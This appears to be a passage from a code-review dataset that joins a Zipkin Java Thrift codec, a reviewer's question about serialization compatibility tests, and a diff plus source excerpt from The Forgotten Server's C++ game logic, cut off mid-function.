result.endpoint(ENDPOINT_ADAPTER.read(bytes)); } else { skip(bytes, field.type); } } return result.build(); } @Override public void write(Annotation value, Buffer buffer) { TIMESTAMP.write(buffer); buffer.writeLong(value.timestamp); if (value.value != null) { VALUE.write(buffer); writeUtf8(buffer, value.value); } if (value.endpoint != null) { ENDPOINT.write(buffer); ENDPOINT_ADAPTER.write(value.endpoint, buffer); } buffer.writeByte(TYPE_STOP); } }; static final ThriftAdapter<BinaryAnnotation> BINARY_ANNOTATION_ADAPTER = new ThriftAdapter<BinaryAnnotation>() { final Field KEY = new Field(TYPE_STRING, 1); final Field VALUE = new Field(TYPE_STRING, 2); final Field TYPE = new Field(TYPE_I32, 3); final Field ENDPOINT = new Field(TYPE_STRUCT, 4); @Override public BinaryAnnotation read(ByteBuffer bytes) { BinaryAnnotation.Builder result = BinaryAnnotation.builder(); Field field; while (true) { field = Field.read(bytes); if (field.type == TYPE_STOP) break; if (field.isEqualTo(KEY)) { result.key(readUtf8(bytes)); } else if (field.isEqualTo(VALUE)) { result.value(readByteArray(bytes)); } else if (field.isEqualTo(TYPE)) { 
result.type(BinaryAnnotation.Type.fromValue(bytes.getInt())); } else if (field.isEqualTo(ENDPOINT)) { result.endpoint(ENDPOINT_ADAPTER.read(bytes)); } else { skip(bytes, field.type); } } return result.build(); } @Override public void write(BinaryAnnotation value, Buffer buffer) { KEY.write(buffer); writeUtf8(buffer, value.key); VALUE.write(buffer); buffer.writeInt(value.value.length); buffer.write(value.value); TYPE.write(buffer); buffer.writeInt(value.type.value); if (value.endpoint != null) { ENDPOINT.write(buffer); ENDPOINT_ADAPTER.write(value.endpoint, buffer); } buffer.writeByte(TYPE_STOP); } }; static final ThriftAdapter<List<Annotation>> ANNOTATIONS_ADAPTER = new ListAdapter<>(ANNOTATION_ADAPTER); static final ThriftAdapter<List<BinaryAnnotation>> BINARY_ANNOTATIONS_ADAPTER = new ListAdapter<>(BINARY_ANNOTATION_ADAPTER); static final ThriftAdapter<Span> SPAN_ADAPTER = new ThriftAdapter<Span>() { final Field TRACE_ID = new Field(TYPE_I64, 1); final Field NAME = new Field(TYPE_STRING, 3); final Field ID = new Field(TYPE_I64, 4); final Field PARENT_ID = new Field(TYPE_I64, 5); final Field ANNOTATIONS = new Field(TYPE_LIST, 6); final Field BINARY_ANNOTATIONS = new Field(TYPE_LIST, 8); final Field DEBUG = new Field(TYPE_BOOL, 9); final Field TIMESTAMP = new Field(TYPE_I64, 10); final Field DURATION = new Field(TYPE_I64, 11); @Override public Span read(ByteBuffer bytes) { Span.Builder result = Span.builder(); Field field; while (true) { field = Field.read(bytes); if (field.type == TYPE_STOP) break; if (field.isEqualTo(TRACE_ID)) { result.traceId(bytes.getLong()); } else if (field.isEqualTo(NAME)) { result.name(readUtf8(bytes)); } else if (field.isEqualTo(ID)) { result.id(bytes.getLong()); } else if (field.isEqualTo(PARENT_ID)) { result.parentId(bytes.getLong()); } else if (field.isEqualTo(ANNOTATIONS)) { result.annotations(ANNOTATIONS_ADAPTER.read(bytes)); } else if (field.isEqualTo(BINARY_ANNOTATIONS)) { result.binaryAnnotations(BINARY_ANNOTATIONS_ADAPTER.read(bytes)); } else if (field.isEqualTo(DEBUG)) { result.debug(bytes.get() == 1); } else if (field.isEqualTo(TIMESTAMP)) { result.timestamp(bytes.getLong()); } else if (field.isEqualTo(DURATION)) { result.duration(bytes.getLong()); } else { skip(bytes, field.type); } } return result.build(); } @Override public void write(Span value, Buffer buffer) { TRACE_ID.write(buffer); buffer.writeLong(value.traceId); NAME.write(buffer); writeUtf8(buffer, value.name); ID.write(buffer); buffer.writeLong(value.id); if (value.parentId != null) { PARENT_ID.write(buffer); buffer.writeLong(value.parentId); } ANNOTATIONS.write(buffer); ANNOTATIONS_ADAPTER.write(value.annotations, buffer); BINARY_ANNOTATIONS.write(buffer); BINARY_ANNOTATIONS_ADAPTER.write(value.binaryAnnotations, buffer); if (value.debug != null) { DEBUG.write(buffer); buffer.writeByte(value.debug ? 
1 : 0); } if (value.timestamp != null) { TIMESTAMP.write(buffer); buffer.writeLong(value.timestamp); } if (value.duration != null) { DURATION.write(buffer); buffer.writeLong(value.duration); } buffer.writeByte(TYPE_STOP); } @Override public String toString() { return "Span"; } }; static final ThriftAdapter<List<Span>> SPANS_ADAPTER = new ListAdapter<>(SPAN_ADAPTER); static final ThriftAdapter<List<List<Span>>> TRACES_ADAPTER = new ListAdapter<>(SPANS_ADAPTER); static final ThriftAdapter<DependencyLink> DEPENDENCY_LINK_ADAPTER = new ThriftAdapter<DependencyLink>() { final Field PARENT = new Field(TYPE_STRING, 1); final Field CHILD = new Field(TYPE_STRING, 2); final Field CALL_COUNT = new Field(TYPE_I64, 4); @Override public DependencyLink read(ByteBuffer bytes) { DependencyLink.Builder result = DependencyLink.builder(); Field field; while (true) { field = Field.read(bytes); if (field.type == TYPE_STOP) break; if (field.isEqualTo(PARENT)) { result.parent(readUtf8(bytes)); } else if (field.isEqualTo(CHILD)) { result.child(readUtf8(bytes)); } else if (field.isEqualTo(CALL_COUNT)) { result.callCount(bytes.getLong()); } else { skip(bytes, field.type); } } return result.build(); } @Override public void write(DependencyLink value, Buffer buffer) { PARENT.write(buffer); writeUtf8(buffer, value.parent); CHILD.write(buffer); writeUtf8(buffer, value.child); CALL_COUNT.write(buffer); buffer.writeLong(value.callCount); buffer.writeByte(TYPE_STOP); } @Override public String toString() { return "DependencyLink"; } }; static final ThriftAdapter<List<DependencyLink>> DEPENDENCY_LINKS_ADAPTER = new ListAdapter<>(DEPENDENCY_LINK_ADAPTER); /** * Added for DataStax Cassandra driver, which returns data in ByteBuffers. The implementation * takes care not to re-buffer the data. * * @throws {@linkplain IllegalArgumentException} if the links couldn't be decoded */ public List<DependencyLink> readDependencyLinks(ByteBuffer bytes) { return read(DEPENDENCY_LINKS_ADAPTER, bytes); } @Override public List<DependencyLink> readDependencyLinks(byte[] bytes) { return read(DEPENDENCY_LINKS_ADAPTER, ByteBuffer.wrap(bytes)); } @Override public byte[] writeDependencyLinks(List<DependencyLink> value) { return write(DEPENDENCY_LINKS_ADAPTER, value); } static <T> T read(ThriftReader<T> reader, ByteBuffer bytes) { checkArgument(bytes.remaining() > 0, "Empty input reading %s", reader); try { return reader.read(bytes); } catch (RuntimeException e) { throw exceptionReading(reader.toString(), bytes, e); } } /** Inability to encode is a programming bug. 
*/ static <T> byte[] write(ThriftWriter<T> writer, T value) { Buffer buffer = new Buffer(); try { writer.write(value, buffer); } catch (RuntimeException e) { throw new AssertionError("Could not write " + value + " as TBinary", e); } return buffer.readByteArray(); } static <T> List<T> readList(ThriftReader<T> reader, ByteBuffer bytes) { byte ignoredType = bytes.get(); int length = guardLength(bytes, CONTAINER_LENGTH_LIMIT); if (length == 0) return Collections.emptyList(); if (length == 1) return Collections.singletonList(reader.read(bytes)); List<T> result = new ArrayList<>(length); for (int i = 0; i < length; i++) { result.add(reader.read(bytes)); } return result; } static <T> void writeList(ThriftWriter<T> writer, List<T> value, Buffer buffer) { int length = value.size(); writeListBegin(buffer, length); for (int i = 0; i < length; i++) { writer.write(value.get(i), buffer); } } static final class ListAdapter<T> implements ThriftAdapter<List<T>> { final ThriftAdapter<T> adapter; ListAdapter(ThriftAdapter<T> adapter) { this.adapter = adapter; } @Override public List<T> read(ByteBuffer bytes) { return readList(adapter, bytes); } @Override public void write(List<T> value, Buffer buffer) { writeList(adapter, value, buffer); } @Override public String toString() { return "List<" + adapter + ">"; } } static IllegalArgumentException exceptionReading(String type, ByteBuffer bytes, Exception e) { String cause = e.getMessage() == null ? "Error" : e.getMessage(); if (e instanceof EOFException) cause = "EOF"; if (e instanceof IllegalStateException || e instanceof BufferUnderflowException) cause = "Malformed"; String message = String.format("%s reading %s from TBinary: ", cause, type, bytes); throw new IllegalArgumentException(message, e); } static final class Field { final byte type; final int id; Field(byte type, int id) { this.type = type; this.id = id; } void write(Buffer buffer) { buffer.writeByte(type); buffer.writeShort(id); } static Field read(ByteBuffer bytes) { byte type = bytes.get(); return new Field(type, type == TYPE_STOP ? 
TYPE_STOP : bytes.getShort()); } boolean isEqualTo(Field that) { return this.type == that.type && this.id == that.id; } } static void skip(ByteBuffer bytes, byte type) { skip(bytes, type, MAX_SKIP_DEPTH); } static void skip(ByteBuffer bytes, byte type, int maxDepth) { if (maxDepth <= 0) throw new IllegalStateException("Maximum skip depth exceeded"); switch (type) { case TYPE_BOOL: case TYPE_BYTE: skip(bytes, 1); break; case TYPE_I16: skip(bytes, 2); break; case TYPE_I32: skip(bytes, 4); break; case TYPE_DOUBLE: case TYPE_I64: skip(bytes, 8); break; case TYPE_STRING: int size = guardLength(bytes, STRING_LENGTH_LIMIT); skip(bytes, size); break; case TYPE_STRUCT: while (true) { Field field = Field.read(bytes); if (field.type == TYPE_STOP) return; skip(bytes, field.type, maxDepth - 1); } case TYPE_MAP: byte keyType = bytes.get(); byte valueType = bytes.get(); for (int i = 0, length = guardLength(bytes, CONTAINER_LENGTH_LIMIT); i < length; i++) { skip(bytes, keyType, maxDepth - 1); skip(bytes, valueType, maxDepth - 1); } break; case TYPE_SET: case TYPE_LIST: byte elemType = bytes.get(); for (int i = 0, length = guardLength(bytes, CONTAINER_LENGTH_LIMIT); i < length; i++) { skip(bytes, elemType, maxDepth - 1); } break; default: // types that don't need explicit skipping break; } } static void skip(ByteBuffer bytes, int count) { bytes.position(bytes.position() + count); } static byte[] readByteArray(ByteBuffer bytes) { byte[] result = new byte[guardLength(bytes, STRING_LENGTH_LIMIT)]; bytes.get(result); return result; } static String readUtf8(ByteBuffer bytes) { return new String(readByteArray(bytes), UTF_8); } static int guardLength(ByteBuffer bytes, int limit) { int length = bytes.getInt(); if (length > limit) { // don't allocate massive arrays throw new IllegalStateException(length + " > " + limit + ": possibly malformed thrift"); } return length; } static void writeListBegin(Buffer buffer, int size) { buffer.writeByte(TYPE_STRUCT); buffer.writeInt(size); } static void writeUtf8(Buffer buffer, String string) { Buffer temp = new Buffer().writeUtf8(string); buffer.writeInt((int) temp.size()); buffer.write(temp, temp.size()); } }
1
11,374
@adriancole I do not see a change in the thrift file. Are there unit tests verifying that this manual serialization is compatible with the native Thrift serialization done by classes generated from the `.thrift` IDL file?
openzipkin-zipkin
java
@@ -506,7 +506,7 @@ Player* Game::getPlayerByGUID(const uint32_t& guid)
 ReturnValue Game::getPlayerByNameWildcard(const std::string& s, Player*& player)
 {
 	size_t strlen = s.length();
-	if (strlen == 0 || strlen > 20) {
+	if (strlen == 0 || strlen > PLAYER_NAME_LENGHT) {
 		return RETURNVALUE_PLAYERWITHTHISNAMEISNOTONLINE;
 	}
1
/** * The Forgotten Server - a free and open-source MMORPG server emulator * Copyright (C) 2019 Mark Samman <[email protected]> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License along * with this program; if not, write to the Free Software Foundation, Inc., * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. */ #include "otpch.h" #include "pugicast.h" #include "actions.h" #include "bed.h" #include "configmanager.h" #include "creature.h" #include "creatureevent.h" #include "databasetasks.h" #include "events.h" #include "game.h" #include "globalevent.h" #include "iologindata.h" #include "iomarket.h" #include "items.h" #include "monster.h" #include "movement.h" #include "scheduler.h" #include "server.h" #include "spells.h" #include "talkaction.h" #include "weapons.h" #include "script.h" #include <fmt/format.h> extern ConfigManager g_config; extern Actions* g_actions; extern Chat* g_chat; extern TalkActions* g_talkActions; extern Spells* g_spells; extern Vocations g_vocations; extern GlobalEvents* g_globalEvents; extern CreatureEvents* g_creatureEvents; extern Events* g_events; extern Monsters g_monsters; extern MoveEvents* g_moveEvents; extern Weapons* g_weapons; extern Scripts* g_scripts; Game::Game() { offlineTrainingWindow.defaultEnterButton = 1; offlineTrainingWindow.defaultEscapeButton = 0; offlineTrainingWindow.choices.emplace_back("Sword Fighting and Shielding", SKILL_SWORD); offlineTrainingWindow.choices.emplace_back("Axe Fighting and Shielding", SKILL_AXE); offlineTrainingWindow.choices.emplace_back("Club Fighting and Shielding", SKILL_CLUB); offlineTrainingWindow.choices.emplace_back("Distance Fighting and Shielding", SKILL_DISTANCE); offlineTrainingWindow.choices.emplace_back("Magic Level and Shielding", SKILL_MAGLEVEL); offlineTrainingWindow.buttons.emplace_back("Okay", offlineTrainingWindow.defaultEnterButton); offlineTrainingWindow.buttons.emplace_back("Cancel", offlineTrainingWindow.defaultEscapeButton); offlineTrainingWindow.priority = true; } Game::~Game() { for (const auto& it : guilds) { delete it.second; } } void Game::start(ServiceManager* manager) { serviceManager = manager; updateWorldTime(); if (g_config.getBoolean(ConfigManager::DEFAULT_WORLD_LIGHT)) { g_scheduler.addEvent(createSchedulerTask(EVENT_LIGHTINTERVAL, std::bind(&Game::checkLight, this))); } g_scheduler.addEvent(createSchedulerTask(EVENT_CREATURE_THINK_INTERVAL, std::bind(&Game::checkCreatures, this, 0))); g_scheduler.addEvent(createSchedulerTask(EVENT_DECAYINTERVAL, std::bind(&Game::checkDecay, this))); } GameState_t Game::getGameState() const { return gameState; } void Game::setWorldType(WorldType_t type) { worldType = type; } void Game::setGameState(GameState_t newState) { if (gameState == GAME_STATE_SHUTDOWN) { return; //this cannot be stopped } if (gameState == newState) { return; } gameState = newState; switch (newState) { case GAME_STATE_INIT: { groups.load(); g_chat->load(); map.spawns.startup(); raids.loadFromXml(); raids.startup(); quests.loadFromXml(); mounts.loadFromXml(); 
loadMotdNum(); loadPlayersRecord(); loadAccountStorageValues(); g_globalEvents->startup(); break; } case GAME_STATE_SHUTDOWN: { g_globalEvents->execute(GLOBALEVENT_SHUTDOWN); //kick all players that are still online auto it = players.begin(); while (it != players.end()) { it->second->kickPlayer(true); it = players.begin(); } saveMotdNum(); saveGameState(); g_dispatcher.addTask( createTask(std::bind(&Game::shutdown, this))); g_scheduler.stop(); g_databaseTasks.stop(); g_dispatcher.stop(); break; } case GAME_STATE_CLOSED: { /* kick all players without the CanAlwaysLogin flag */ auto it = players.begin(); while (it != players.end()) { if (!it->second->hasFlag(PlayerFlag_CanAlwaysLogin)) { it->second->kickPlayer(true); it = players.begin(); } else { ++it; } } saveGameState(); break; } default: break; } } void Game::saveGameState() { if (gameState == GAME_STATE_NORMAL) { setGameState(GAME_STATE_MAINTAIN); } std::cout << "Saving server..." << std::endl; if (!saveAccountStorageValues()) { std::cout << "[Error - Game::saveGameState] Failed to save account-level storage values." << std::endl; } for (const auto& it : players) { it.second->loginPosition = it.second->getPosition(); IOLoginData::savePlayer(it.second); } Map::save(); g_databaseTasks.flush(); if (gameState == GAME_STATE_MAINTAIN) { setGameState(GAME_STATE_NORMAL); } } bool Game::loadMainMap(const std::string& filename) { return map.loadMap("data/world/" + filename + ".otbm", true); } void Game::loadMap(const std::string& path) { map.loadMap(path, false); } Cylinder* Game::internalGetCylinder(Player* player, const Position& pos) const { if (pos.x != 0xFFFF) { return map.getTile(pos); } //container if (pos.y & 0x40) { uint8_t from_cid = pos.y & 0x0F; return player->getContainerByID(from_cid); } //inventory return player; } Thing* Game::internalGetThing(Player* player, const Position& pos, int32_t index, uint32_t spriteId, stackPosType_t type) const { if (pos.x != 0xFFFF) { Tile* tile = map.getTile(pos); if (!tile) { return nullptr; } Thing* thing; switch (type) { case STACKPOS_LOOK: { return tile->getTopVisibleThing(player); } case STACKPOS_MOVE: { Item* item = tile->getTopDownItem(); if (item && item->isMoveable()) { thing = item; } else { thing = tile->getTopVisibleCreature(player); } break; } case STACKPOS_USEITEM: { thing = tile->getUseItem(index); break; } case STACKPOS_TOPDOWN_ITEM: { thing = tile->getTopDownItem(); break; } case STACKPOS_USETARGET: { thing = tile->getTopVisibleCreature(player); if (!thing) { thing = tile->getUseItem(index); } break; } default: { thing = nullptr; break; } } if (player && tile->hasFlag(TILESTATE_SUPPORTS_HANGABLE)) { //do extra checks here if the thing is accessible if (thing && thing->getItem()) { if (tile->hasProperty(CONST_PROP_ISVERTICAL)) { if (player->getPosition().x + 1 == tile->getPosition().x) { thing = nullptr; } } else { // horizontal if (player->getPosition().y + 1 == tile->getPosition().y) { thing = nullptr; } } } } return thing; } //container if (pos.y & 0x40) { uint8_t fromCid = pos.y & 0x0F; Container* parentContainer = player->getContainerByID(fromCid); if (!parentContainer) { return nullptr; } if (parentContainer->getID() == ITEM_BROWSEFIELD) { Tile* tile = parentContainer->getTile(); if (tile && tile->hasFlag(TILESTATE_SUPPORTS_HANGABLE)) { if (tile->hasProperty(CONST_PROP_ISVERTICAL)) { if (player->getPosition().x + 1 == tile->getPosition().x) { return nullptr; } } else { // horizontal if (player->getPosition().y + 1 == tile->getPosition().y) { return nullptr; } } } } uint8_t slot 
= pos.z; return parentContainer->getItemByIndex(player->getContainerIndex(fromCid) + slot); } else if (pos.y == 0 && pos.z == 0) { const ItemType& it = Item::items.getItemIdByClientId(spriteId); if (it.id == 0) { return nullptr; } int32_t subType; if (it.isFluidContainer() && index < static_cast<int32_t>(sizeof(reverseFluidMap) / sizeof(uint8_t))) { subType = reverseFluidMap[index]; } else { subType = -1; } return findItemOfType(player, it.id, true, subType); } //inventory slots_t slot = static_cast<slots_t>(pos.y); if (slot == CONST_SLOT_STORE_INBOX) { return player->getStoreInbox(); } return player->getInventoryItem(slot); } void Game::internalGetPosition(Item* item, Position& pos, uint8_t& stackpos) { pos.x = 0; pos.y = 0; pos.z = 0; stackpos = 0; Cylinder* topParent = item->getTopParent(); if (topParent) { if (Player* player = dynamic_cast<Player*>(topParent)) { pos.x = 0xFFFF; Container* container = dynamic_cast<Container*>(item->getParent()); if (container) { pos.y = static_cast<uint16_t>(0x40) | static_cast<uint16_t>(player->getContainerID(container)); pos.z = container->getThingIndex(item); stackpos = pos.z; } else { pos.y = player->getThingIndex(item); stackpos = pos.y; } } else if (Tile* tile = topParent->getTile()) { pos = tile->getPosition(); stackpos = tile->getThingIndex(item); } } } Creature* Game::getCreatureByID(uint32_t id) { if (id <= Player::playerAutoID) { return getPlayerByID(id); } else if (id <= Monster::monsterAutoID) { return getMonsterByID(id); } else if (id <= Npc::npcAutoID) { return getNpcByID(id); } return nullptr; } Monster* Game::getMonsterByID(uint32_t id) { if (id == 0) { return nullptr; } auto it = monsters.find(id); if (it == monsters.end()) { return nullptr; } return it->second; } Npc* Game::getNpcByID(uint32_t id) { if (id == 0) { return nullptr; } auto it = npcs.find(id); if (it == npcs.end()) { return nullptr; } return it->second; } Player* Game::getPlayerByID(uint32_t id) { if (id == 0) { return nullptr; } auto it = players.find(id); if (it == players.end()) { return nullptr; } return it->second; } Creature* Game::getCreatureByName(const std::string& s) { if (s.empty()) { return nullptr; } const std::string& lowerCaseName = asLowerCaseString(s); { auto it = mappedPlayerNames.find(lowerCaseName); if (it != mappedPlayerNames.end()) { return it->second; } } auto equalCreatureName = [&](const std::pair<uint32_t, Creature*>& it) { auto name = it.second->getName(); return lowerCaseName.size() == name.size() && std::equal(lowerCaseName.begin(), lowerCaseName.end(), name.begin(), [](char a, char b) { return a == std::tolower(b); }); }; { auto it = std::find_if(npcs.begin(), npcs.end(), equalCreatureName); if (it != npcs.end()) { return it->second; } } { auto it = std::find_if(monsters.begin(), monsters.end(), equalCreatureName); if (it != monsters.end()) { return it->second; } } return nullptr; } Npc* Game::getNpcByName(const std::string& s) { if (s.empty()) { return nullptr; } const char* npcName = s.c_str(); for (const auto& it : npcs) { if (strcasecmp(npcName, it.second->getName().c_str()) == 0) { return it.second; } } return nullptr; } Player* Game::getPlayerByName(const std::string& s) { if (s.empty()) { return nullptr; } auto it = mappedPlayerNames.find(asLowerCaseString(s)); if (it == mappedPlayerNames.end()) { return nullptr; } return it->second; } Player* Game::getPlayerByGUID(const uint32_t& guid) { if (guid == 0) { return nullptr; } auto it = mappedPlayerGuids.find(guid); if (it == mappedPlayerGuids.end()) { return nullptr; } return it->second; 
} ReturnValue Game::getPlayerByNameWildcard(const std::string& s, Player*& player) { size_t strlen = s.length(); if (strlen == 0 || strlen > 20) { return RETURNVALUE_PLAYERWITHTHISNAMEISNOTONLINE; } if (s.back() == '~') { const std::string& query = asLowerCaseString(s.substr(0, strlen - 1)); std::string result; ReturnValue ret = wildcardTree.findOne(query, result); if (ret != RETURNVALUE_NOERROR) { return ret; } player = getPlayerByName(result); } else { player = getPlayerByName(s); } if (!player) { return RETURNVALUE_PLAYERWITHTHISNAMEISNOTONLINE; } return RETURNVALUE_NOERROR; } Player* Game::getPlayerByAccount(uint32_t acc) { for (const auto& it : players) { if (it.second->getAccount() == acc) { return it.second; } } return nullptr; } bool Game::internalPlaceCreature(Creature* creature, const Position& pos, bool extendedPos /*=false*/, bool forced /*= false*/) { if (creature->getParent() != nullptr) { return false; } if (!map.placeCreature(pos, creature, extendedPos, forced)) { return false; } creature->incrementReferenceCounter(); creature->setID(); creature->addList(); return true; } bool Game::placeCreature(Creature* creature, const Position& pos, bool extendedPos /*=false*/, bool forced /*= false*/) { if (!internalPlaceCreature(creature, pos, extendedPos, forced)) { return false; } SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true); for (Creature* spectator : spectators) { if (Player* tmpPlayer = spectator->getPlayer()) { tmpPlayer->sendCreatureAppear(creature, creature->getPosition(), true); } } for (Creature* spectator : spectators) { spectator->onCreatureAppear(creature, true); } creature->getParent()->postAddNotification(creature, nullptr, 0); addCreatureCheck(creature); creature->onPlacedCreature(); return true; } bool Game::removeCreature(Creature* creature, bool isLogout/* = true*/) { if (creature->isRemoved()) { return false; } Tile* tile = creature->getTile(); std::vector<int32_t> oldStackPosVector; SpectatorVec spectators; map.getSpectators(spectators, tile->getPosition(), true); for (Creature* spectator : spectators) { if (Player* player = spectator->getPlayer()) { oldStackPosVector.push_back(player->canSeeCreature(creature) ? 
tile->getClientIndexOfCreature(player, creature) : -1); } } tile->removeCreature(creature); const Position& tilePosition = tile->getPosition(); //send to client size_t i = 0; for (Creature* spectator : spectators) { if (Player* player = spectator->getPlayer()) { player->sendRemoveTileCreature(creature, tilePosition, oldStackPosVector[i++]); } } //event method for (Creature* spectator : spectators) { spectator->onRemoveCreature(creature, isLogout); } creature->getParent()->postRemoveNotification(creature, nullptr, 0); creature->removeList(); creature->setRemoved(); ReleaseCreature(creature); removeCreatureCheck(creature); for (Creature* summon : creature->summons) { summon->setSkillLoss(false); removeCreature(summon); } return true; } void Game::executeDeath(uint32_t creatureId) { Creature* creature = getCreatureByID(creatureId); if (creature && !creature->isRemoved()) { creature->onDeath(); } } void Game::playerMoveThing(uint32_t playerId, const Position& fromPos, uint16_t spriteId, uint8_t fromStackPos, const Position& toPos, uint8_t count) { Player* player = getPlayerByID(playerId); if (!player) { return; } uint8_t fromIndex = 0; if (fromPos.x == 0xFFFF) { if (fromPos.y & 0x40) { fromIndex = fromPos.z; } else { fromIndex = static_cast<uint8_t>(fromPos.y); } } else { fromIndex = fromStackPos; } Thing* thing = internalGetThing(player, fromPos, fromIndex, 0, STACKPOS_MOVE); if (!thing) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } if (Creature* movingCreature = thing->getCreature()) { Tile* tile = map.getTile(toPos); if (!tile) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } if (Position::areInRange<1, 1, 0>(movingCreature->getPosition(), player->getPosition())) { SchedulerTask* task = createSchedulerTask(1000, std::bind(&Game::playerMoveCreatureByID, this, player->getID(), movingCreature->getID(), movingCreature->getPosition(), tile->getPosition())); player->setNextActionTask(task); } else { playerMoveCreature(player, movingCreature, movingCreature->getPosition(), tile); } } else if (thing->getItem()) { Cylinder* toCylinder = internalGetCylinder(player, toPos); if (!toCylinder) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } playerMoveItem(player, fromPos, spriteId, fromStackPos, toPos, count, thing->getItem(), toCylinder); } } void Game::playerMoveCreatureByID(uint32_t playerId, uint32_t movingCreatureId, const Position& movingCreatureOrigPos, const Position& toPos) { Player* player = getPlayerByID(playerId); if (!player) { return; } Creature* movingCreature = getCreatureByID(movingCreatureId); if (!movingCreature) { return; } Tile* toTile = map.getTile(toPos); if (!toTile) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } playerMoveCreature(player, movingCreature, movingCreatureOrigPos, toTile); } void Game::playerMoveCreature(Player* player, Creature* movingCreature, const Position& movingCreatureOrigPos, Tile* toTile) { if (!player->canDoAction()) { uint32_t delay = player->getNextActionTime(); SchedulerTask* task = createSchedulerTask(delay, std::bind(&Game::playerMoveCreatureByID, this, player->getID(), movingCreature->getID(), movingCreatureOrigPos, toTile->getPosition())); player->setNextActionTask(task); return; } if (movingCreature->isMovementBlocked()) { player->sendCancelMessage(RETURNVALUE_NOTMOVEABLE); return; } player->setNextActionTask(nullptr); if (!Position::areInRange<1, 1, 0>(movingCreatureOrigPos, player->getPosition())) { //need to walk to the creature first before moving it std::vector<Direction> 
listDir; if (player->getPathTo(movingCreatureOrigPos, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(1500, std::bind(&Game::playerMoveCreatureByID, this, player->getID(), movingCreature->getID(), movingCreatureOrigPos, toTile->getPosition())); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } if ((!movingCreature->isPushable() && !player->hasFlag(PlayerFlag_CanPushAllCreatures)) || (movingCreature->isInGhostMode() && !player->canSeeGhostMode(movingCreature))) { player->sendCancelMessage(RETURNVALUE_NOTMOVEABLE); return; } //check throw distance const Position& movingCreaturePos = movingCreature->getPosition(); const Position& toPos = toTile->getPosition(); if ((Position::getDistanceX(movingCreaturePos, toPos) > movingCreature->getThrowRange()) || (Position::getDistanceY(movingCreaturePos, toPos) > movingCreature->getThrowRange()) || (Position::getDistanceZ(movingCreaturePos, toPos) * 4 > movingCreature->getThrowRange())) { player->sendCancelMessage(RETURNVALUE_DESTINATIONOUTOFREACH); return; } if (player != movingCreature) { if (toTile->hasFlag(TILESTATE_BLOCKPATH)) { player->sendCancelMessage(RETURNVALUE_NOTENOUGHROOM); return; } else if ((movingCreature->getZone() == ZONE_PROTECTION && !toTile->hasFlag(TILESTATE_PROTECTIONZONE)) || (movingCreature->getZone() == ZONE_NOPVP && !toTile->hasFlag(TILESTATE_NOPVPZONE))) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } else { if (CreatureVector* tileCreatures = toTile->getCreatures()) { for (Creature* tileCreature : *tileCreatures) { if (!tileCreature->isInGhostMode()) { player->sendCancelMessage(RETURNVALUE_NOTENOUGHROOM); return; } } } Npc* movingNpc = movingCreature->getNpc(); if (movingNpc && !Spawns::isInZone(movingNpc->getMasterPos(), movingNpc->getMasterRadius(), toPos)) { player->sendCancelMessage(RETURNVALUE_NOTENOUGHROOM); return; } } } if (!g_events->eventPlayerOnMoveCreature(player, movingCreature, movingCreaturePos, toPos)) { return; } ReturnValue ret = internalMoveCreature(*movingCreature, *toTile); if (ret != RETURNVALUE_NOERROR) { player->sendCancelMessage(ret); } } ReturnValue Game::internalMoveCreature(Creature* creature, Direction direction, uint32_t flags /*= 0*/) { creature->setLastPosition(creature->getPosition()); const Position& currentPos = creature->getPosition(); Position destPos = getNextPosition(direction, currentPos); Player* player = creature->getPlayer(); bool diagonalMovement = (direction & DIRECTION_DIAGONAL_MASK) != 0; if (player && !diagonalMovement) { //try to go up if (currentPos.z != 8 && creature->getTile()->hasHeight(3)) { Tile* tmpTile = map.getTile(currentPos.x, currentPos.y, currentPos.getZ() - 1); if (tmpTile == nullptr || (tmpTile->getGround() == nullptr && !tmpTile->hasFlag(TILESTATE_BLOCKSOLID))) { tmpTile = map.getTile(destPos.x, destPos.y, destPos.getZ() - 1); if (tmpTile && tmpTile->getGround() && !tmpTile->hasFlag(TILESTATE_BLOCKSOLID)) { flags |= FLAG_IGNOREBLOCKITEM | FLAG_IGNOREBLOCKCREATURE; if (!tmpTile->hasFlag(TILESTATE_FLOORCHANGE)) { player->setDirection(direction); destPos.z--; } } } } //try to go down if (currentPos.z != 7 && currentPos.z == destPos.z) { Tile* tmpTile = map.getTile(destPos.x, destPos.y, destPos.z); if (tmpTile == nullptr || (tmpTile->getGround() == nullptr && !tmpTile->hasFlag(TILESTATE_BLOCKSOLID))) { tmpTile = map.getTile(destPos.x, destPos.y, destPos.z + 
1); if (tmpTile && tmpTile->hasHeight(3)) { flags |= FLAG_IGNOREBLOCKITEM | FLAG_IGNOREBLOCKCREATURE; player->setDirection(direction); destPos.z++; } } } } Tile* toTile = map.getTile(destPos); if (!toTile) { return RETURNVALUE_NOTPOSSIBLE; } return internalMoveCreature(*creature, *toTile, flags); } ReturnValue Game::internalMoveCreature(Creature& creature, Tile& toTile, uint32_t flags /*= 0*/) { //check if we can move the creature to the destination ReturnValue ret = toTile.queryAdd(0, creature, 1, flags); if (ret != RETURNVALUE_NOERROR) { return ret; } map.moveCreature(creature, toTile); if (creature.getParent() != &toTile) { return RETURNVALUE_NOERROR; } int32_t index = 0; Item* toItem = nullptr; Tile* subCylinder = nullptr; Tile* toCylinder = &toTile; Tile* fromCylinder = nullptr; uint32_t n = 0; while ((subCylinder = toCylinder->queryDestination(index, creature, &toItem, flags)) != toCylinder) { map.moveCreature(creature, *subCylinder); if (creature.getParent() != subCylinder) { //could happen if a script move the creature fromCylinder = nullptr; break; } fromCylinder = toCylinder; toCylinder = subCylinder; flags = 0; //to prevent infinite loop if (++n >= 